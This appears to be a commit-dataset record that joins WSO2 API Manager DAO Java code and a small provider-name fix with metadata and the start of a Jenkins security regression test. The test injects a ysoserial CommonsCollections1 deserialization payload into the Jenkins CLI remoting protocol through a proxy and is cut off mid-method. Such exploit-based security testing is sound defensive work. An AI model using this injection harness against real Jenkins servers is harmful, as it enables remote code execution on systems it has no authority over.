prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding API product " + apiproduct.getName() + " of provider " + apiproduct.getProvider(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddAPIProduct, null, null); APIMgtDBUtil.closeAllConnections(prepStmtAddResourceMapping, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } public APIProduct getAPIProduct(String uuid) throws APIManagementException { APIProduct product = new APIProduct(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; PreparedStatement prepStmtGetAPIProductResource = null; ResultSet rs = null; ResultSet rs2 = null; try { connection = APIMgtDBUtil.getConnection(); //TODO check this //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,STATE FROM AM_API_PRODUCT WHERE UUID = ?"; int productId = 0; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, uuid); rs = prepStmtGetAPIProduct.executeQuery(); if (rs.next()) { product.setUuid(rs.getString("UUID")); product.setDescription(rs.getString("DESCRIPTION")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setName(rs.getString("API_PRODUCT_NAME")); product.setProductTier(rs.getString("API_PRODUCT_TIER")); product.setVisibility(rs.getString("VISIBILITY")); product.setBusinessOwner(rs.getString("BUSINESS_OWNER")); product.setBusinessOwnerEmail(rs.getString("BUSINESS_OWNER_EMAIL")); product.setSubscriptionAvailability(rs.getString("SUBSCRIPTION_AVAILABILITY")); product.setState(rs.getString("STATE")); productId = rs.getInt("API_PRODUCT_ID"); } //get api resources related to api product //TODO move to constant String queryListProductResourceMapping = "SELECT API_NAME, API_PROVIDER , API_VERSION ,T1.API_ID ,API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, " + "T1.URL_MAPPING_ID " + "FROM " + "(SELECT API_NAME ,API_PROVIDER, API_VERSION, API.API_ID,URL.URL_MAPPING_ID " + "FROM AM_API_URL_MAPPING URL, AM_API API " + "WHERE API.API_ID = URL.API_ID) T1 " + "INNER JOIN " + "(SELECT API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, URL.URL_MAPPING_ID " + "FROM AM_API_PRODUCT_MAPPING PRODUCT, AM_API_URL_MAPPING URL " + "WHERE URL.URL_MAPPING_ID = PRODUCT.URL_MAPPING_ID AND API_PRODUCT_ID =? ) T2 " + "ON " + "(T1.URL_MAPPING_ID =T2.URL_MAPPING_ID )"; prepStmtGetAPIProductResource = connection.prepareStatement(queryListProductResourceMapping); prepStmtGetAPIProductResource.setInt(1, productId); //keep a temporary map for each resources for each api in the product Map<String, APIProductResource> resourceMap = new HashMap<String, APIProductResource>(); String apiId = ""; rs2 = prepStmtGetAPIProductResource.executeQuery(); while (rs2.next()) { apiId = rs2.getString("API_ID"); APIProductResource resource; if (resourceMap.containsKey(apiId)) { resource = resourceMap.get(apiId); } else { resource = new APIProductResource(); resource.setApiName(rs2.getString("API_NAME")); APIIdentifier identifier = new APIIdentifier(rs2.getString("API_PROVIDER"), rs2.getString("API_NAME"), rs2.getString("API_VERSION")); resource.setApiId(identifier.toString()); // TODO set API UUID resource.setApiIdentifier(identifier); } URITemplate template = new URITemplate(); template.setHTTPVerb(rs2.getString("HTTP_METHOD")); template.setResourceURI(rs2.getString("URL_PATTERN")); template.setId(rs2.getInt("URL_MAPPING_ID")); resource.setResource(template); resourceMap.put(apiId, resource); } product.setProductResources(new ArrayList<APIProductResource>(resourceMap.values())); } catch (SQLException e) { handleException("Error while retrieving api product for UUID " + uuid , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, null, rs); APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProductResource, connection, rs2); } return product; } public List<APIProduct> getAPIProductsForTenantDomain(String tenantDomain) throws APIManagementException { List<APIProduct> productList = new ArrayList<APIProduct>(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,TENANT_DOMAIN,STATE FROM AM_API_PRODUCT WHERE TENANT_DOMAIN = ?"; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, tenantDomain); rs = prepStmtGetAPIProduct.executeQuery(); while (rs.next()) { APIProduct product = new APIProduct(); //only send a product.setName(rs.getString("API_PRODUCT_NAME")); product.setUuid(rs.getString("UUID")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setState(rs.getString("STATE")); productList.add(product); } } catch (SQLException e) { handleException("Error while retrieving api product for tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, connection, rs); } return productList; } public void deleteAPIProduct(String uuid, String tenantDomain) throws APIManagementException { String deleteQuery = "DELETE FROM AM_API_PRODUCT WHERE UUID = ? AND TENANT_DOMAIN = ?"; PreparedStatement ps = null; Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(deleteQuery); ps.setString(1, uuid); ps.setString(2, tenantDomain); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting api product " + uuid + " tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } private void deleteProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; String querydeleteProductMappingsForAPI = "DELETE FROM AM_API_PRODUCT_MAPPING WHERE URL_MAPPING_ID = ?"; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); preparedStatement = connection.prepareStatement(querydeleteProductMappingsForAPI); for (APIProduct apiProduct : apiProducts) { List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (productResource.getApiIdentifier().equals(api.getId())) { //TODO: check and modify to use UUID List<URITemplate> mappedAPIResources = productResource.getResources(); if (mappedAPIResources.size() > 0 && log.isDebugEnabled()) { log.debug( "Removing url mappings from API : " + api.getId().toString() + " on API product : " + apiProduct.getName()); } for (URITemplate template : mappedAPIResources) { preparedStatement.setInt(1, template.getId()); preparedStatement.addBatch(); } } } } preparedStatement.executeBatch(); preparedStatement.clearBatch(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on API product mapping updating", e1); } } handleException("Error occured while removing url template mappings from API " + api.getId().toString() + " on API Products.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, null); } } private void addProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; String queryAddProductResourceMappings = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddProductResourceMappings = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmtAddProductResourceMappings = connection.prepareStatement(queryAddProductResourceMappings); //get previously added resources and re-add them to product with new URL_MAPPING_ID Map<String, URITemplate> templateMap = getURITemplatesForAPI(api); int productId; for (APIProduct apiProduct : apiProducts) { productId = getAPIProductId(apiProduct.getName(), apiProduct.getProvider(), null); List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (api.getId().equals(productResource.getApiIdentifier())) { List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { String key = template.getHTTPVerb() + ":" + template.getResourceURI(); if (templateMap.containsKey(key)) { //update api template mapping id template.setId(templateMap.get(key).getId()); //add record to database back with new ID prepStmtAddProductResourceMappings.setInt(1, productId); prepStmtAddProductResourceMappings.setInt(2, template.getId()); prepStmtAddProductResourceMappings.addBatch(); } else { //ToDo : what if the resource had been deleted while updating API log.info("Resource " + key + " was deleted from API " + api.getId().toString() + " while updating the API. So it is no longer available with API product " + apiProduct.getName()); } } } } } prepStmtAddProductResourceMappings.executeBatch(); prepStmtAddProductResourceMappings.clearBatch(); connection.commit(); } catch (SQLException e) { } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddProductResourceMappings, connection, null); } } private int getAPIProductId(String productName, String provider, String version) throws APIManagementException { Connection conn = null; //TODO: move query to constants. Use version for now I am not using version in the query since it is still set to null String queryGetProductId = "SELECT API_PRODUCT_ID FROM AM_API_PRODUCT WHERE API_PRODUCT_NAME = ? AND " + "API_PRODUCT_PROVIDER = ?"; PreparedStatement preparedStatement = null; ResultSet rs = null; int productId = -1; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(queryGetProductId); preparedStatement.setString(1, productName); preparedStatement.setString(2, provider); rs = preparedStatement.executeQuery(); if (rs.next()) { productId = rs.getInt("API_PRODUCT_ID"); } if (productId == -1) { String msg = "Unable to find the API Product : " + productId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while retrieving api product id for product " + productName + " by " + provider, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, rs); } return productId; } private void addProductScopes(List<APIProduct> apiProducts, int tenantID) throws APIManagementException { Connection connection = null; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddcopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[] { "scope_id" }); prepStmtAddcopeLink = connection.prepareStatement(queryAddcopeLink); prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); for (APIProduct apiProduct : apiProducts) { //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiProduct.getName() + ":" + apiProduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); int scopeId = 0; prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, tenantID); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()) { scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException( "Error while adding scope for API product : " + apiProduct.getUuid()); } productScope.setId(scopeId); //attach product scope to each resource api List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { APIIdentifier apiIdentifier = productResource.getApiIdentifier(); prepStmtAddcopeLink.setInt(1, getAPIID(apiIdentifier, connection)); prepStmtAddcopeLink.setInt(2, scopeId); prepStmtAddcopeLink.addBatch(); //attach product scope to resource mappings List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), template.getResourceURI(), template.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, tenantID); prepStmtAddScopeResourceMapping.addBatch(); } } } prepStmtAddcopeLink.executeBatch(); prepStmtAddcopeLink.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding product resource and scope mappings for api product ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmtAddcopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } }
Fix tenant api product creation issue
components/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java
Fix tenant api product creation issue
<ide><path>omponents/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java <ide> prepStmt = connection.prepareStatement(query); <ide> prepStmt.setString(1, api.getId().getApiName()); <ide> prepStmt.setString(2, api.getId().getVersion()); <del> prepStmt.setString(3, api.getId().getProviderName()); <add> prepStmt.setString(3, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); <ide> rs = prepStmt.executeQuery(); <ide> while (rs.next()) { <ide> URITemplate template = new URITemplate();
Java
mit
d7023f9a368317bb838046ccc9a3fe5b08db3945
0
batmat/jenkins,FarmGeek4Life/jenkins,gitaccountforprashant/gittest,MarkEWaite/jenkins,gusreiber/jenkins,varmenise/jenkins,ChrisA89/jenkins,huybrechts/hudson,batmat/jenkins,kohsuke/hudson,andresrc/jenkins,bpzhang/jenkins,FarmGeek4Life/jenkins,MichaelPranovich/jenkins_sc,pjanouse/jenkins,varmenise/jenkins,sathiya-mit/jenkins,escoem/jenkins,dennisjlee/jenkins,NehemiahMi/jenkins,dennisjlee/jenkins,ChrisA89/jenkins,rlugojr/jenkins,escoem/jenkins,aldaris/jenkins,jglick/jenkins,v1v/jenkins,kohsuke/hudson,stephenc/jenkins,ikedam/jenkins,recena/jenkins,recena/jenkins,sathiya-mit/jenkins,pjanouse/jenkins,olivergondza/jenkins,lilyJi/jenkins,amruthsoft9/Jenkis,ydubreuil/jenkins,kohsuke/hudson,jenkinsci/jenkins,jenkinsci/jenkins,Jochen-A-Fuerbacher/jenkins,alvarolobato/jenkins,DanielWeber/jenkins,viqueen/jenkins,kzantow/jenkins,ajshastri/jenkins,protazy/jenkins,Vlatombe/jenkins,sathiya-mit/jenkins,Jimilian/jenkins,pjanouse/jenkins,sathiya-mit/jenkins,rsandell/jenkins,protazy/jenkins,dennisjlee/jenkins,stephenc/jenkins,olivergondza/jenkins,patbos/jenkins,batmat/jenkins,duzifang/my-jenkins,FarmGeek4Life/jenkins,msrb/jenkins,NehemiahMi/jenkins,tangkun75/jenkins,varmenise/jenkins,NehemiahMi/jenkins,stephenc/jenkins,vjuranek/jenkins,wuwen5/jenkins,hplatou/jenkins,gitaccountforprashant/gittest,MichaelPranovich/jenkins_sc,jenkinsci/jenkins,patbos/jenkins,rlugojr/jenkins,wuwen5/jenkins,ErikVerheul/jenkins,protazy/jenkins,tangkun75/jenkins,DanielWeber/jenkins,SebastienGllmt/jenkins,duzifang/my-jenkins,ErikVerheul/jenkins,ErikVerheul/jenkins,viqueen/jenkins,samatdav/jenkins,ndeloof/jenkins,samatdav/jenkins,dariver/jenkins,amuniz/jenkins,amruthsoft9/Jenkis,ajshastri/jenkins,wuwen5/jenkins,bkmeneguello/jenkins,ErikVerheul/jenkins,csimons/jenkins,kzantow/jenkins,csimons/jenkins,jglick/jenkins,Jochen-A-Fuerbacher/jenkins,DanielWeber/jenkins,kzantow/jenkins,jenkinsci/jenkins,jglick/jenkins,evernat/jenkins,ChrisA89/jenkins,jpbriend/jenkins,bkmeneguello/jenkins,ChrisA89/jenkins,FarmGeek4Life/jenkins,MarkEWaite/jenkins,huybrechts/hudson,jpbriend/jenkins,damianszczepanik/jenkins,dariver/jenkins,batmat/jenkins,daniel-beck/jenkins,kzantow/jenkins,kohsuke/hudson,Vlatombe/jenkins,csimons/jenkins,MichaelPranovich/jenkins_sc,escoem/jenkins,azweb76/jenkins,bpzhang/jenkins,csimons/jenkins,tangkun75/jenkins,ErikVerheul/jenkins,ChrisA89/jenkins,msrb/jenkins,ydubreuil/jenkins,recena/jenkins,jenkinsci/jenkins,stephenc/jenkins,godfath3r/jenkins,recena/jenkins,fbelzunc/jenkins,tfennelly/jenkins,rsandell/jenkins,patbos/jenkins,vjuranek/jenkins,gitaccountforprashant/gittest,fbelzunc/jenkins,andresrc/jenkins,daniel-beck/jenkins,stephenc/jenkins,bkmeneguello/jenkins,Ykus/jenkins,aldaris/jenkins,andresrc/jenkins,jpbriend/jenkins,amuniz/jenkins,jglick/jenkins,aldaris/jenkins,msrb/jenkins,evernat/jenkins,MichaelPranovich/jenkins_sc,andresrc/jenkins,huybrechts/hudson,evernat/jenkins,alvarolobato/jenkins,huybrechts/hudson,csimons/jenkins,bpzhang/jenkins,msrb/jenkins,jpbriend/jenkins,huybrechts/hudson,protazy/jenkins,escoem/jenkins,oleg-nenashev/jenkins,olivergondza/jenkins,huybrechts/hudson,amruthsoft9/Jenkis,olivergondza/jenkins,NehemiahMi/jenkins,amuniz/jenkins,ChrisA89/jenkins,amuniz/jenkins,jpbriend/jenkins,escoem/jenkins,gusreiber/jenkins,viqueen/jenkins,patbos/jenkins,dariver/jenkins,protazy/jenkins,dennisjlee/jenkins,Vlatombe/jenkins,oleg-nenashev/jenkins,amuniz/jenkins,aldaris/jenkins,SebastienGllmt/jenkins,evernat/jenkins,oleg-nenashev/jenkins,daniel-beck/jenkins,damianszczepanik/jenkins,ErikVerheul/jenkins,fbelzunc/jenkins,ikedam/jenkins,ikedam/jenkins,kzantow/jenkins,ndeloof/jenkins,tfennelly/jenkins,duzifang/my-jenkins,MichaelPranovich/jenkins_sc,ikedam/jenkins,escoem/jenkins,ydubreuil/jenkins,Ykus/jenkins,v1v/jenkins,jglick/jenkins,rsandell/jenkins,wuwen5/jenkins,patbos/jenkins,oleg-nenashev/jenkins,samatdav/jenkins,damianszczepanik/jenkins,dariver/jenkins,kohsuke/hudson,NehemiahMi/jenkins,fbelzunc/jenkins,gitaccountforprashant/gittest,DanielWeber/jenkins,aldaris/jenkins,batmat/jenkins,protazy/jenkins,samatdav/jenkins,MarkEWaite/jenkins,azweb76/jenkins,vjuranek/jenkins,bpzhang/jenkins,daniel-beck/jenkins,godfath3r/jenkins,jpbriend/jenkins,fbelzunc/jenkins,amruthsoft9/Jenkis,oleg-nenashev/jenkins,MarkEWaite/jenkins,vjuranek/jenkins,andresrc/jenkins,bkmeneguello/jenkins,samatdav/jenkins,msrb/jenkins,msrb/jenkins,godfath3r/jenkins,csimons/jenkins,tfennelly/jenkins,v1v/jenkins,amruthsoft9/Jenkis,andresrc/jenkins,Jimilian/jenkins,ChrisA89/jenkins,ajshastri/jenkins,v1v/jenkins,batmat/jenkins,lilyJi/jenkins,bkmeneguello/jenkins,Jochen-A-Fuerbacher/jenkins,rsandell/jenkins,amuniz/jenkins,godfath3r/jenkins,gitaccountforprashant/gittest,gitaccountforprashant/gittest,jenkinsci/jenkins,ydubreuil/jenkins,Vlatombe/jenkins,DanielWeber/jenkins,sathiya-mit/jenkins,dariver/jenkins,v1v/jenkins,oleg-nenashev/jenkins,damianszczepanik/jenkins,gusreiber/jenkins,hplatou/jenkins,pjanouse/jenkins,pjanouse/jenkins,andresrc/jenkins,christ66/jenkins,tfennelly/jenkins,rlugojr/jenkins,kohsuke/hudson,MichaelPranovich/jenkins_sc,lilyJi/jenkins,Vlatombe/jenkins,ikedam/jenkins,ndeloof/jenkins,jenkinsci/jenkins,godfath3r/jenkins,recena/jenkins,alvarolobato/jenkins,olivergondza/jenkins,ydubreuil/jenkins,stephenc/jenkins,ydubreuil/jenkins,evernat/jenkins,christ66/jenkins,azweb76/jenkins,damianszczepanik/jenkins,DanielWeber/jenkins,amuniz/jenkins,tfennelly/jenkins,ajshastri/jenkins,fbelzunc/jenkins,lilyJi/jenkins,Jimilian/jenkins,SebastienGllmt/jenkins,Jimilian/jenkins,Ykus/jenkins,christ66/jenkins,gusreiber/jenkins,ndeloof/jenkins,Jochen-A-Fuerbacher/jenkins,godfath3r/jenkins,duzifang/my-jenkins,duzifang/my-jenkins,kohsuke/hudson,lilyJi/jenkins,daniel-beck/jenkins,ikedam/jenkins,ndeloof/jenkins,christ66/jenkins,Jochen-A-Fuerbacher/jenkins,DanielWeber/jenkins,amruthsoft9/Jenkis,wuwen5/jenkins,tangkun75/jenkins,sathiya-mit/jenkins,v1v/jenkins,lilyJi/jenkins,bpzhang/jenkins,dariver/jenkins,SebastienGllmt/jenkins,FarmGeek4Life/jenkins,SebastienGllmt/jenkins,jenkinsci/jenkins,FarmGeek4Life/jenkins,SebastienGllmt/jenkins,bkmeneguello/jenkins,dennisjlee/jenkins,Vlatombe/jenkins,alvarolobato/jenkins,godfath3r/jenkins,Ykus/jenkins,dennisjlee/jenkins,viqueen/jenkins,SebastienGllmt/jenkins,batmat/jenkins,ndeloof/jenkins,daniel-beck/jenkins,alvarolobato/jenkins,rlugojr/jenkins,csimons/jenkins,dennisjlee/jenkins,evernat/jenkins,ajshastri/jenkins,bkmeneguello/jenkins,tangkun75/jenkins,tangkun75/jenkins,wuwen5/jenkins,Ykus/jenkins,vjuranek/jenkins,Vlatombe/jenkins,christ66/jenkins,Jimilian/jenkins,escoem/jenkins,fbelzunc/jenkins,azweb76/jenkins,MichaelPranovich/jenkins_sc,daniel-beck/jenkins,pjanouse/jenkins,ndeloof/jenkins,samatdav/jenkins,pjanouse/jenkins,rsandell/jenkins,christ66/jenkins,damianszczepanik/jenkins,rlugojr/jenkins,viqueen/jenkins,hplatou/jenkins,stephenc/jenkins,azweb76/jenkins,recena/jenkins,viqueen/jenkins,rsandell/jenkins,tfennelly/jenkins,v1v/jenkins,ikedam/jenkins,oleg-nenashev/jenkins,sathiya-mit/jenkins,NehemiahMi/jenkins,ajshastri/jenkins,ydubreuil/jenkins,lilyJi/jenkins,christ66/jenkins,MarkEWaite/jenkins,patbos/jenkins,varmenise/jenkins,jglick/jenkins,hplatou/jenkins,olivergondza/jenkins,MarkEWaite/jenkins,bpzhang/jenkins,gusreiber/jenkins,olivergondza/jenkins,amruthsoft9/Jenkis,Jochen-A-Fuerbacher/jenkins,azweb76/jenkins,varmenise/jenkins,gusreiber/jenkins,aldaris/jenkins,MarkEWaite/jenkins,viqueen/jenkins,bpzhang/jenkins,recena/jenkins,Ykus/jenkins,wuwen5/jenkins,ajshastri/jenkins,patbos/jenkins,varmenise/jenkins,msrb/jenkins,rsandell/jenkins,duzifang/my-jenkins,azweb76/jenkins,rlugojr/jenkins,Ykus/jenkins,daniel-beck/jenkins,hplatou/jenkins,gusreiber/jenkins,kohsuke/hudson,jpbriend/jenkins,alvarolobato/jenkins,FarmGeek4Life/jenkins,tfennelly/jenkins,tangkun75/jenkins,duzifang/my-jenkins,kzantow/jenkins,damianszczepanik/jenkins,Jimilian/jenkins,ikedam/jenkins,Jimilian/jenkins,damianszczepanik/jenkins,evernat/jenkins,Jochen-A-Fuerbacher/jenkins,hplatou/jenkins,dariver/jenkins,huybrechts/hudson,rlugojr/jenkins,rsandell/jenkins,samatdav/jenkins,MarkEWaite/jenkins,kzantow/jenkins,NehemiahMi/jenkins,vjuranek/jenkins,aldaris/jenkins,protazy/jenkins,ErikVerheul/jenkins,hplatou/jenkins,gitaccountforprashant/gittest,alvarolobato/jenkins,vjuranek/jenkins,jglick/jenkins,varmenise/jenkins
/* * The MIT License * * Copyright 2015 CloudBees, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package jenkins.security; import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; import hudson.cli.CLI; import hudson.cli.CliPort; import hudson.remoting.BinarySafeStream; import hudson.util.DaemonThreadFactory; import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.HttpURLConnection; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.URL; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import jenkins.security.security218.ysoserial.payloads.CommonsCollections1; import jenkins.security.security218.ysoserial.util.Serializables; import static org.junit.Assert.*; import org.junit.Test; import org.junit.Rule; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.recipes.PresetData; public class Security218BlackBoxTest { private static final String overrideURL = System.getenv("VICTIM_JENKINS_URL"); private static final String overrideHome = System.getenv("VICTIM_JENKINS_HOME"); static { assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); } private static final ExecutorService executors = Executors.newCachedThreadPool(new DaemonThreadFactory()); @Rule public JenkinsRule r = new JenkinsRule(); @SuppressWarnings("deprecation") // really mean to use getPage(String) @PresetData(PresetData.DataSet.ANONYMOUS_READONLY) // TODO userContent inaccessible without authentication otherwise @Test public void probe() throws Exception { JenkinsRule.WebClient wc = r.createWebClient(); final URL url = overrideURL == null ? r.getURL() : new URL(overrideURL); wc.getPage(url + "userContent/readme.txt"); try { wc.getPage(url + "userContent/pwned"); fail("already compromised?"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } for (int round = 0; round < 2; round++) { final int _round = round; final ServerSocket proxySocket = new ServerSocket(0); executors.submit(new Runnable() { @Override public void run() { try { Socket proxy = proxySocket.accept(); Socket real = new Socket(url.getHost(), ((HttpURLConnection) url.openConnection()).getHeaderFieldInt("X-Jenkins-CLI-Port", -1)); final InputStream realIS = real.getInputStream(); final OutputStream realOS = real.getOutputStream(); final InputStream proxyIS = proxy.getInputStream(); final OutputStream proxyOS = proxy.getOutputStream(); executors.submit(new Runnable() { @Override public void run() { try { // Read up to \x00\x00\x00\x00, end of header. int nullCount = 0; ByteArrayOutputStream buf = new ByteArrayOutputStream(); int c; while ((c = realIS.read()) != -1) { proxyOS.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } System.err.print("← "); display(buf.toByteArray()); System.err.println(); // Now assume we are in chunked transport. PACKETS: while (true) { buf.reset(); //System.err.println("reading one packet"); while (true) { // one packet, ≥1 chunk //System.err.println("reading one chunk"); int hi = realIS.read(); if (hi == -1) { break PACKETS; } proxyOS.write(hi); int lo = realIS.read(); proxyOS.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; //System.err.printf("waiting for %X bytes%n", len); for (int i = 0; i < len; i++) { c = realIS.read(); proxyOS.write(c); buf.write(c); } if (hasMore) { continue; } System.err.print("← "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); break; } } } catch (IOException x) { x.printStackTrace(); } } }); executors.submit(new Runnable() { @Override public void run() { try { ByteArrayOutputStream buf = new ByteArrayOutputStream(); ByteArrayOutputStream toCopy = new ByteArrayOutputStream(); int c; int nullCount = 0; while ((c = proxyIS.read()) != -1) { toCopy.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } if (_round == 0) { System.err.println("injecting payload into capability negotiation"); // replacing \x00\x14Protocol:CLI-connect<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00 new DataOutputStream(realOS).writeUTF("Protocol:CLI-connect"); // TCP agent protocol byte[] PREAMBLE = "<===[JENKINS REMOTING CAPACITY]===>".getBytes("UTF-8"); // Capability realOS.write(PREAMBLE); OutputStream bss = BinarySafeStream.wrap(realOS); bss.write(payload()); bss.flush(); } else { System.err.print("→ "); display(buf.toByteArray()); System.err.println(); realOS.write(toCopy.toByteArray()); } int packet = 0; PACKETS: while (true) { buf.reset(); toCopy.reset(); while (true) { int hi = proxyIS.read(); if (hi == -1) { break PACKETS; } toCopy.write(hi); int lo = proxyIS.read(); toCopy.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; for (int i = 0; i < len; i++) { c = proxyIS.read(); toCopy.write(c); buf.write(c); } if (hasMore) { continue; } if (++packet == _round) { System.err.println("injecting payload into packet"); byte[] data = payload(); realOS.write(data.length / 256); 